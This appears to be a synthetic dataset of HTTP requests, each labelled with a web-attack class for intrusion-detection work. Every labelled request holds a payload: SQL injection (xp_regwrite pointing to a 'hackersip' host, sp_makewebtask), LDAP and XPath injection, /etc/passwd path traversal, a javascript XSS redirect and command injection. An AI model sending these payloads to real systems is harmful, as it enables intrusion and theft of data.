GET /8Ut4LrwbalmfmEn5Ag/ei9isanffa/nLMEjilU@I1Z8naSgj/8S/ilasiasoaiiasueen/6_NE3R9OsVO/d2mjlnhnvrMtroten/r5A.htm?nesmfp=126142&.5uF=%29++++%28++++%7C+++%28cn%3D*o++%27brien*+++%29%28mail++++%3D*o++++%27brien*+%29+++ HTTP/1.0
Host: www.nTaos.be
Connection: mwentt6
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, gzip;q=0.7, deflate, compress;q=0.8
Accept-Language: r-s;q=0.2, rmibE-ienoscg, inrEenup-tuy08hkS;q=0.1, nuane9s-3, pxseF-md;q=0.2
Cache-Control: min-fresh=80615
Client-ip: 238.249.58.159
Cookie: Iuvbaewn=/ton62ecfonege];jp4.d=oev8X;gnhnlvmnRdonea=i?xterm
Cookie2: $Version="22"
Date: Mon, 18 Sep 06 06:38:54 GMT
ETag: W/"cvMbx4sfux4.USQJj"
Expect: 100-continue
From: 5n7e@llnrwde3K.st
If-Modified-Since: Sun, 12 Dec 04 10:38:42 UTC
If-Unmodified-Since: Thu, 14 Jun 07 18:11:24 UTC
If-Match: "bLXmob2Ols7v_NwxR1I"
If-None-Match: *
If-Range: "qqk1eSLudV2R98BwYA"
Max-Forwards: 55
MIME-Version: 3.1
Pragma: EsRS1m=dT7u5i8c
Proxy-Authorization: Basic dGlvbDp6c2xibmU=
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: 041-993632,66658-,9-1
Referer: http://www.Rsnelod.ch/royrn/dnvtura/bchicso/Eiutih/tn8Gro.exe
TE: gzip
Trailer: Via
User-Agent: 6oriaselse
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: 8val/5.8 225.168.231.126, FTP/4.9 www.ixacv.css
Transfer-Encoding: gzip
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38180
Start - Id: 35052
class: SqlInjection
GET /iv/HF/e4LA7i.html?CZoUDZ9Yj=exec++++xp_regwrite+++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27ahhnn%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&4wAh=isc&fh7Eoao1=o6a+rasock_streamfv%27serviceslocationttnnr&la5m=VEherolai3s&he=rV1qN&s8havingpEd=062793184 HTTP/1.1
Host: 145.187.122.214:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-7, windows-1252;q=0.6, x-mac-korean;q=0.4, x-mac-roman;q=0.0
Accept-Encoding: 
Accept-Language: dl-hjnusn;q=0.8, reaf-iglbaima;q=0.5
Cache-Control: no-cache
Client-ip: 175.67.198.190
Cookie: EvLMMHU=l]sf;;imNriiwhesotdh= -;eao=cpinsertecho4;hYmNnata7oidbg= perl/c;homhYohi3r=aotAeijeseso;9ljb7=:
Cookie2: $Version="16"
Date: Sat, 23 Apr 05 01:06:48 GMT
ETag: W/"G2puLN1UmKCx5WB9Ef"
Expect: 100-continue
If-Modified-Since: Tue, 18 Jul 06 01:34:39 GMT
If-Unmodified-Since: Wed, 31 Mar 04 10:23:10 UTC
If-Match: "9ZYLA89ve9xKQ.Kx"
If-None-Match: "WkeUE2OF866syH9gqE"
If-Range: "@x4hYxC9ukkoLTw-k"
Max-Forwards: 43
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: Basic ZGZvaTphZW5lbg==
Range: 56684-,-230
Referer: http://www.Obht.cz/gat2de0s/rt8dmes/rs1tn/te7u.swf
TE: trailers,gzip;q=0.0,deflate
User-Agent: Mozilla/1.7 (X11; U; Open BSD i386 8.4; hz-En; rv:1.5.5) Gecko/61899096
UA-CPU: StrongARM
UA-Color: color16
Via: uytu/5.4 www.wgae9.js, 7.1 www.lcgi1oee.jpg
Transfer-Encoding: compress
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35052
Start - Id: 37804
class: LdapInjection
GET /rnaSanmciSne/Xi39y1t/hcTrresw5/OOqVjkgroup bya5acopyl/THZcMUC.GYxml/Het63renbOteoer/dCuegFhiuG1nT/cmdsl9/enoLczydoa/h3-c/i28@IKfM8.js?alSwetlncuemEH=0928&oloBz=v4aiygB063o6Tlrd&itsd=rers%29%28++++%7C%28mE%3D*%29&spTnH=1&rXedriaena7e=jei%5Ci&s0s6awoEas4bpaE=huEyie&ey=zyDLnlo&lsssF=om1oBatQw HTTP/1.0
Host: 148.147.36.251
Connection: aheeip
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312;q=0.1, macintosh, utf-7, iso-8859-1
Accept-Encoding: *
Accept-Language: sudoeeo-ngmy, f-Grpolo;q=0.6, jcyisr-oh;q=0.1
Cache-Control: max-stale=5454
Client-ip: 148.220.0.143
Cookie: gospa=77696541;oi1rnO6s=pet31lNiuitfnf;7LnS9nodleaaaac=11769846;i6rEevlBvhee=3naperltbodyhconnecthsSnnullestdinelsf;5uwtar=rL2FU-3brCk;2-J6=h6OvoHTcv-07
Cookie2: $Version="22"
Date: Tue, 05 Feb 08 13:50:31 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Wed, 24 Feb 10 10:15:45 CET
If-Match: *
If-None-Match: "hW.fIAZfKoFn4SpC6LX"
If-Range: *
Max-Forwards: 951
MIME-Version: 1.7
Pragma: riC=erS9aa
Proxy-Authorization: nres 8iga8qk=JHmer
Authorization: NTLM Y3NzNnJseDVzb2VrZGVhbXQ5YXRtdXQ5YWVxcnN0MXZpYXQ=
Range: -1,56487-
Referer: /dSms/eartat1h/taot/evnie/ewehp.msf
TE: gzip,gzip;q=0.6,gzip
Trailer: Expect
User-Agent: Mozilla/1.6 (X11; U; Open BSD i386 8.8; zo-to; rv:1.8.9) Gecko/52845771
UA-CPU: x86
UA-Disp: 654,6999,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: HTTP/3.5 www.ioonetA.gif:97447
Transfer-Encoding: identity
Upgrade: rasu/0.8, teies/0.4, nSn4/5.5, rceyaa/2.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37804
Start - Id: 44801
class: PathTransversal
GET /oWeq7KWs3do7ENZAP/mUaV/Ry/oDp9n_Gv7AYCCbhhrL/nxLGjZYu/eO-pV3jGwzTn9qEUC/0wroeeltetwsfi/6yrISbtalichd8ts/fbN7/5u6lseoalollsn/a@3-9OGaz-frMP8/k5jHq9rrh@.S4.mspx?nresso=3479253433&s5ea6=hrna&E6t=8333&ssl6nreOot=.%2F..%2F.%2F..%2F&uu=rhi%26&UrU.aZxR=bcgco15hgsu&oaalOyp=6988995&DHameaudsoo=lyZq38B&iheWd=82342580&ussio7=8&8tgtw=hh0emn-nohe&hsn=%3D%2Ft%3Eioadminocsorfn%3Du%26&gerbrn=S%7Cd HTTP/1.0
Host: www.7LtdP.de
Connection: gDiw
Accept: */*
Accept-Charset: euc-kr;q=0.0
Accept-Encoding: gzip;q=0.7, gzip;q=0.2
Accept-Language: acya1nhM-ieaei0v;q=0.9, zvhvon-tdtig;q=0.0, td8hE7e-1r, igai-otinftcE
Cache-Control: no-store
Client-ip: 197.105.10.211
Cookie: xSaanohherrct=2;9noctztmaL=e6-o;HoD8andtB=3;th=rnc;sMiP6BDsSL=eMt
Cookie2: $Version="73"
Date: Tue, 05 Jan 10 16:49:06 CET
ETag: W/"djyw31vse5DU8jEaNO_"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 19 Jul 05 15:44:20 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Feb 07 21:50:31 GMT
Max-Forwards: 4
MIME-Version: 7.4
Pragma: 7erira=rnd
Proxy-Authorization: Digest qop=auth
Authorization: Basic c2FpYTptdGExUmxv
Range: -64744,0-
Referer: http://en7Auttk.it/szgtihu.msf
TE: trailers,deflate,gzip
Trailer: Pragma
User-Agent: 9f0aL9ft (hv9waovtq; t27XMm; iZCek5v; 3V7Yxvw)
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 4.5 182.36.213.142, FTP/1.0 57.54.96.233, HTTP/6.4 220.191.149.19
Transfer-Encoding: ncqru; klDi=mthma
Upgrade: nraObn/3.7
Warning: 306 www.lawl.shtml "aurdPlier1ephtrtem2m" "Sun, 15 Feb 04 16:47:27 UTC"
X-Forwarded-For: 122.93.208.190
X-Serial-Number: 42053074878
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44801
Start - Id: 43941
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: www.uefyAti5es.net
Connection: keep-alive
Accept: image/*;q=0.0, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: npZoyb-ao;q=0.5, e9aE-eoe;q=0.2
Cache-Control: no-store
Client-ip: 203.44.173.36
Cookie: oeidse=sCpsU0ad;isie5d2w=soi;impDoliuhrll=887
Cookie2: $Version="4"
Date: Thu, 14 Oct 04 12:32:21 CET
ETag: "CAA1BX3UtwQhtOdd"
Expect: Ktdna
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Tue, 07 Aug 07 12:10:07 CET
If-Unmodified-Since: Wed, 20 May 09 06:05:33 GMT
If-Match: "Ed_MEUpQFIM27pN2sk"
If-None-Match: *
If-Range: Mon, 20 Feb 06 23:34:26 UTC
Max-Forwards: 78
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: mf1a EoRlezn=jhdc
Range: 080946-24031
Referer: /uaomuFw/8hln.css
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: dioihtnr8p (cydov2VJ; tLrahOo; fLofyIBrc; rdGUngHra)
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 3.5 www.mfdfo.jpg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43941
Start - Id: 48706
class: XPathInjection
PUT /r4ty/rexouEfha3onlg.mspx? HTTP/1.1
Content-Length: 176
Content-Language: czpdi
Content-Encoding: gzip
Content-Location: http://rnh3erx0.org/rii7loe/teNoytrd/0msaS0t/xuuneb.css
Content-MD5: dHNjOXppM21jY2xmYWllYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Feb 07 23:01:33 UTC
Last-Modified: Sun, 04 Dec 05 21:01:35 CET
Host: www.5catgpdo.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: Ne-tge4Ru, moeanTo-mraeA;q=0.7, rihhltrh-eY
Cache-Control: no-store
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="372"
Date: Tue, 11 May 04 18:54:51 CET
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: iuxo
From: Wquiz@fowi.gov
If-Modified-Since: Sun, 12 Mar 06 24:52:48 UTC
If-Unmodified-Since: Thu, 25 Sep 08 02:22:28 GMT
If-Match: "zklvf@qOWeyLm0WYHMHm"
If-None-Match: *
If-Range: Thu, 09 Jun 05 08:30:44 GMT
Max-Forwards: 7349
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Tttob ruoutTbl=ttEyagpr
Authorization: NTLM aHo2cnQ4bW5ZcmVmNXJhZXVtb3NpY2V1U2xBaElsZWE=
Range: 522185-0,03103-
Referer: /sjeeanp/ap5s.txt
TE: deflate;q=0.7,deflate;q=0.0,chunked
Trailer: Expect
User-Agent: Mozilla/8.0 (X11; U; Open BSD i386 6.1; sf-oH; rv:1.4.3) Gecko/50405354
UA-CPU: 68000
UA-Disp: 2550,506,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 640x9904
Via: 1.7 www.alytr.css
Transfer-Encoding: faisS
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 206.162.122.240
X-Serial-Number: 70312364698710750668
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

mETlr=a2n+telsiw[3od&neIarChrsempAt=aohrrj'    or   path/child::node()[position()=N]  or   'nsYe' = '&dase=t&wid8rewi7=+ks+2oytrT)~tsu

End - Id: 48706
Start - Id: 47121
class: XSS
GET /iq/EQS/td8tosVR8DJcrkQT/eKAdJ4jjFriTMoHRb/svqYP2lw3x.tiff?v5o4=%3Cmeta++++http-equiv+++%3D++%22refresh+++%22++++content+%3D%22++++0%3Burl%3Djavascript%3A++%5Balert+++%28%27rhhla%27%29%3B%5D++%22+++%3E&Oo4s=ortktoHg3wntrtnnnc HTTP/1.0
Host: 118.212.134.121
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese;q=0.4, x-mac-greek, x-mac-hebrew, x-mac-ce
Accept-Encoding: *;q=0.3
Accept-Language: egbue-tUi2ai;q=0.2, i-a, teSoyAmm-ied;q=0.5, wqs-hzrdan;q=0.5
Cache-Control: min-fresh=83735
Client-ip: 111.27.185.154
Cookie: hd=2093
Cookie2: $Version="3"
Date: Thu, 08 Dec 05 05:28:12 CET
ETag: "mQNu2WqrXNJIUGh7"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Mon, 05 May 08 16:20:41 UTC
If-Unmodified-Since: Sun, 21 May 06 20:33:50 UTC
If-Match: *
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 0
MIME-Version: 5.8
Pragma: ghnp2d='dau'
Proxy-Authorization: Digest qop=auth
Authorization: mSft3 s4g9r=z6stJon6
Range: 38-13,-4
Referer: http://www.atS745.st/debeet/gphr/rhVrN0g/TsemhunV.ace
TE: deflate
Trailer: Via
User-Agent: s2ztIk http://www.2v9ns1on.cz
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7372x166
Via: HTTP/3.3 www.ggoa.css, 7.8 www.c5erhzje.gif
Transfer-Encoding: compress
Upgrade: pen/9.1, ccf/6.5
Warning: 236 www.awsdo.css "gdocuisscirL" "Fri, 28 Dec 07 18:21:26 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47121
Start - Id: 35076
class: SqlInjection
GET /vy0-u@H/ohD3G89/mDedgcu/Lcledmahi5/hIt140XpLLK8T/DOFsieshet8f/i3k3Gue-CSuGioiHTX/80tosirunNRf/8T.cgi? HTTP/1.1
Host: 190.76.30.78
Connection: keep-alive
Accept: text/plain;q=0.6
Accept-Charset: iso-8859-9, windows-874;q=0.7
Accept-Encoding: compress, deflate
Accept-Language: and     0<>(select  count(*)    from  qy  where    nonantt<>)
Cache-Control: no-cache
Date: Mon, 10 May 04 09:43:40 UTC
ETag: "8J.PtOrQ4ynhF_j5"
Expect: 100-continue
If-Modified-Since: Sat, 12 Sep 09 13:46:37 UTC
If-Unmodified-Since: Sun, 06 May 07 15:33:45 CET
If-Match: *
If-Range: "9kyzjov_W8_NCuqt8"
Max-Forwards: 271
Pragma: no-cache
Authorization: Basic Um5janR3VDppZGJpZQ==
Range: 8-,02-8893
Referer: /qlue/uRwgo2sr.mpg
User-Agent: Mozilla/2.8 (Windows; U; Win98 1.3; oC-k7; rv:5.8.5) Gecko/34587788
UA-CPU: MIPS
UA-Disp: 7830,290,16
UA-OS: Linux
Transfer-Encoding: identity
----: -----------------------------------------

null

End - Id: 35076
Start - Id: 35026
class: SqlInjection
GET /joweRarE/oeshn5isndnlptisDl35/u9ytasYl5ii8e/tk/tttroaeeo8spjhaz.png? HTTP/1.0
Host: www.ihiai.com:80
Connection: keep-alive
Accept: image/*
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Cookie: dna=';    EXEC   master.dbo.sp_makewebtask    'c:\inetpub\wwwroot\mw.jpeg',  'SELECT     Ben FROM 9t0  WHERE   xtype=''U'''
Date: Wed, 06 Dec 06 11:15:29 UTC
If-Modified-Since: Sun, 13 Apr 08 04:07:09 GMT
If-Unmodified-Since: Sat, 02 Oct 04 22:57:46 CET
If-Range: Mon, 25 Sep 06 21:26:39 CET
Max-Forwards: 851
Proxy-Authorization: sg3ml ay5nl=htdDso
Authorization: NTLM Tm1lZWN0ZWVuVHJ0ZW90blRjeW1hZWlzN25Bb29BUXRldDVka1JzZnBlaWVldDg=
Referer: /b0hvr/teha.php4
TE: deflate,trailers,deflate;q=0.1
User-Agent: Mozilla/6.5 (compatible; Konqueror/7.1; Unix; Ysma; oesPazSop)
Via: FTP/5.5 80.3.49.56, 8.0 www.tnn2r.jpg
X-Serial-Number: 05359052425
----: -----------------------------------

null

End - Id: 35026
Start - Id: 41655
class: SqlInjection
GET /cv@io6yUTqIAO3338/txnumFhutart2ees4.exe?DseiEteohehS=hf2nqT&9ZJpxHt@YI6H=D%27%2Bha&G@fDbetweenr_7processing-instructionls=NS%2Fpi&3frgdcee=94827432&y0nupt=OR+++++%27ozt%27++%3D++%27Sim%27%2B%27ple%27&Bhwsliedi=oq&R0DCH.-Iy4Y9=9603302&itswaerRiehN=5adjSUmbs&tow94segn=p&tecaeeyels9tar=L0sepperl7sneDh&Ososohjeh=sock_stream%5Cohm+lj+%27Rhesltt%7EI HTTP/1.0
Host: 180.207.119.56
Connection: keep-alive
Accept: video/quicktime;q=0.1, application/postscript;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: kohtn-epcer
Cache-Control: volAaS='bst'
Client-ip: 88.68.143.39
Cookie: z_36E4Q=irl~oeiu0o]htfxr phpp;tp=8027
Cookie2: $Version="0"
Date: Wed, 06 Sep 06 21:44:11 UTC
ETag: W/"tK08tBHPggtEMtZ1I-o"
Expect: tdqm
From: oseas@soacs.biz
If-Modified-Since: Fri, 07 Jan 05 04:28:03 UTC
If-Unmodified-Since: Thu, 16 Sep 04 23:48:45 UTC
If-Match: "kuCO08u3.sj9VMq6A_"
If-None-Match: "63gK@fFCw5-Zlst@4L0"
If-Range: "kUR6PynGPM1Y0p4Tg"
Max-Forwards: 5456
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: ebDoe1 e2o6goee=Atbb0aec
Range: 0-,-4,4860-288700
Referer: http://www.cSuowjh.gov/ayxte9/eobp.swf
TE: gzip;q=0.8,trailers,chunked
Trailer: Trailer
User-Agent: een2see (oB@q7Zlo)
UA-CPU: MIPS
UA-Disp: 942,8019,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: HTTP/9.3 www.tieg.jpeg, HTTP/5.1 www.ittNf6.jpg
Transfer-Encoding: eloove; yhsdN=leuiowt
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 553 www.mekn.jpg "dieiIfit2dki8e" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41655
Start - Id: 36262
class: PathTransversal
POST /n05luASfYjNDd6Jnn/iFrFb1PGKsrVfsV-k-N/mZkgXnhSUa2/htaccesLKzjVgL-YERUz/mddsoaasCasni/tVLy_t_Naodgxm2gXwc/3Y5P8bs4F43i6/ubhspE/uPFft7Dw9L_7bah.sh? HTTP/1.1
Content-Length: 213
Content-Language: Hv
Content-Encoding: gzip
Content-Location: http://7esoaca.be/anea/HsO9/gsohit/mydeedt.tiff
Content-MD5: aGRuSWFTb2VraHB0Nm5pdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Feb 10 22:49:13 GMT
Last-Modified: Wed, 10 Oct 07 06:44:48 GMT
Host: www.otlnaisQo9.net
Connection: close
Accept: application/*;q=0.0, application/*;q=0.4, image/*;q=0.3
Accept-Charset: iso-8859-15;q=0.7, cp-936;q=0.9, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="90"
Date: Wed, 29 Nov 06 23:51:53 CET
ETag: "ZZOFOPkzczM28FH7WU"
Expect: 100-continue
From: tarcw@rtJihd7rad.st
If-Modified-Since: Fri, 18 Aug 06 23:17:20 UTC
If-Unmodified-Since: Tue, 21 Mar 06 13:19:29 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 May 08 19:56:09 UTC
Max-Forwards: 9
MIME-Version: 4.1
Pragma: at='lribde'
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: /sehexita/nCeoed/nhhtouo/Ftoc.mp3
TE: gzip;q=0.6,trailers,deflate
Trailer: Via
User-Agent: oxelt4SAk (trK8QIbn; s4oPVetD; yxOLBBnU)
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: 6.4 233.244.8.64:6, 8.5 220.76.61.28, 7.0 0.132.69.0:14681
Transfer-Encoding: compress
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 708089043409657
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ondijye=neia&binubZ=87933421&reuelseAredn5a1=nAPZj&oTdrGshe0ehhsO=ynre4rtu&AhlYfFQ49I=ipXqperlc<fhsaiy einputOor&sOhche2nr153=enk&1gbsg=x7B&tmksy=\.\.\/\.\.\/etc\/passwd&where5F58WmBcR32=sHra

End - Id: 36262
Start - Id: 46414
class: PathTransversal
GET /nodeniraRrhLRQsxEd/lHQxsXo3JP09ah@Ydh./oTHCQv/si7rdhj3/TrteylpsysStji/ea0r4A55b/oeean/ywrdodndleupsonr7hn/r4lITatohensls/99un/nugssuddStJ7eszlonah/ef7rotfTf8.tiff?dhgov7=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&whtd5eahlurn=-nhgebisnm&aeTsmzhseexnau8=chiZCd&raeccirEhtFs=34239&nU=cmdHdhtd%25yrantw+%2Fntt+&orasEbyImieed0=73898&ny2SiW=fbi9c-n&EhZdCuDJ1T=24777795&iinONtp7n=yAJ%40o&c0=aZs&mstNiesolygezT=gle&DFbbd@xo@u7=9659 HTTP/1.1
Host: 71.204.111.110:80
Connection: D59iioo5
Accept: audio/x-wav;q=0.2
Accept-Charset: x-mac-icelandic, koi8, windows-1255
Accept-Encoding: *
Accept-Language: nlats-gcsvTmm;q=0.7, s-yeaNIotr;q=0.9
Cache-Control: max-age=81
Client-ip: 81.141.227.75
Cookie: PIDNconnectCOconnectXQ-=iGr3jM5;nowtphrhO=E3scznefdnk
Date: Tue, 10 Feb 04 19:16:01 GMT
ETag: "7F80YTH_JJbucQ6@88o"
Expect: oAjaWneh
If-Unmodified-Since: Sun, 15 Apr 07 13:43:39 CET
If-Match: "5ZDOH8X.lQ.HddPJ75mD"
Max-Forwards: 926
MIME-Version: 8.9
Proxy-Authorization: Basic U25qbmY6aGhlZA==
Authorization: l2Xanh 5tpe=n7aj
Referer: /di5ti7lo/trvt/itpgzt/t4egra.dll
TE: chunked;q=0.1,trailers,trailers
User-Agent: utea (aBk.NdX; o2ODyoq; bP-CNC)
UA-CPU: PowerPC
Via: vguz4o/4.3 www.honA0rw.css
Transfer-Encoding: nyt8
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 543 208.43.170.15 "hd5o7soouee3cviemc" 
X-Forwarded-For: 80.80.233.157

null

End - Id: 46414
Start - Id: 38833
class: LdapInjection
GET /qwp-v_Pall1perlmochalSIQ9/Lo3YrHeewho761eh/Paccepth5Y/ereao/al8M.mdb?stsem=59&o2diac=23930217&ao8n9psrT=%3F8ae&LBoptiioyqwMv=%29%28+++%7C++%28ao%3DllDt*%29 HTTP/1.0
Host: 203.164.234.19
Connection: keep-alive
Accept: image/png, application/postscript;q=0.7, text/plain;q=0.7
Accept-Charset: iso-8859-7;q=0.9, windows-1257;q=0.5, shift_jis;q=0.1, iso-8859-7, euc-kr;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6374
Client-ip: 244.46.205.26
Cookie: 7thepd9iilaevv3=hsTr;aiceneedfahh=3830941;nr=de4euEut0is
Cookie2: $Version="8"
Date: Sun, 04 Sep 05 09:46:59 GMT
ETag: ".E54oRpEfAdmv5Espqw"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Fri, 27 Oct 06 22:20:13 GMT
If-Unmodified-Since: Thu, 05 Feb 09 04:33:34 UTC
If-Match: *
If-None-Match: "qeH85@nUjvOzhWhX"
If-Range: "C8uIZy8BQ2Svtorr"
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Basic OWF0ZWluOmNlempoYWY=
Range: 088-865,-53,38290-
Referer: http://drZgsz.com/eicph/rllceXo.gz
TE: trailers,trailers
Trailer: If-Range
User-Agent: 92972WIwe http://www.tegs.be
UA-CPU: MIPS
UA-Disp: 3032,6825,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/3.1 72.93.34.165:3939, FTP/3.2 www.sjansr.gif
Transfer-Encoding: identity
Upgrade: 5e2/8.1, neual/2.6, shex0/3.0, srtfSe/9.7
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 19.112.51.121
X-Serial-Number: 465738
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38833
Start - Id: 48456
class: XPathInjection
GET /-B_omochaUk_4O/suri5mrywnogbsyls7/IYftp_qhtaccesB.LVSTRtelnet/daoieew/rPM_Sk8W/g7dxiljrVrAtO/htpassnode5JeOV/oH5.dll?AQhomeidOcBG=073&he3rssbtq1a=ot1decopyhm%40e&hh=DdweFt0toswE&g1=j&iy=jowPwu6mhrHhhfnt&estiIurdpec=Jn9l&tgwtyo=inp+leNhaiet&ceea9cTclu=asock_stream&H-eOje1TB_lJ=8u9m7tIsonnuveo&Tt=ulogeoitiwau5va&ouanO4=2405294313&dadoaUittWrasen=0t&-HRUswYg=7900&2e=uyg&QamPFV2MkW=7763835644 HTTP/1.0
Host: www.qaep6aes32.biz
Connection: keep-alive
Accept: application/rtf;q=0.7
Accept-Charset: hz-gb-2312, x-mac-ce, iso-8859-8-i
Accept-Encoding: *
Accept-Language: R-lunti, aiz-goTi6, tye-ief, lw-d;q=0.7
Cache-Control: no-store
Client-ip: 62.130.69.26
Cookie: a2jlEVLSPC=g;idakguut3=o ptjaakd&u;d9ttbbl=et1t/en/eh1sbi/child::node()[position()=945] or '3lem'  =  ';uD@R=adotm+zqeu  acd
Cookie2: $Version="834"
Date: Mon, 11 Aug 08 14:39:04 GMT
ETag: "tSrdKQzlBgsIDnYV4"
From: nuehal@ifkmfi.it
If-Modified-Since: Sat, 26 Dec 09 23:30:32 GMT
If-Unmodified-Since: Sat, 29 May 04 07:34:47 UTC
If-Match: "EWj8u-AyLDh-3-cF4y"
If-None-Match: "mnXiwwubbhc48N3sYT6V"
If-Range: *
Max-Forwards: 379
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM ZUFsc2FiY2FtRWVyZTF0VXZ0aG9obm80b3BsYjYxbGh0cmVsMzdhelR3b250ZWxo
Authorization: Basic YWd3OGVuOnRoZW5tc24=
Range: -12,39361-
Referer: http://www.tfyjh5.ch/prIudep/onbsin/tGmbfafa/lfhdt.aspx
TE: deflate
User-Agent: neglerriln
UA-CPU: Sparc
UA-Disp: 3766,742,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2402x7254
Via: 9.9 121.128.99.76, 5.5 176.68.101.59:46
Transfer-Encoding: deflate
Upgrade: daft/8.1, resali/5.5, hne1/8.0
X-Forwarded-For: 3.118.59.198
X-Serial-Number: 881741666326313
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 48456
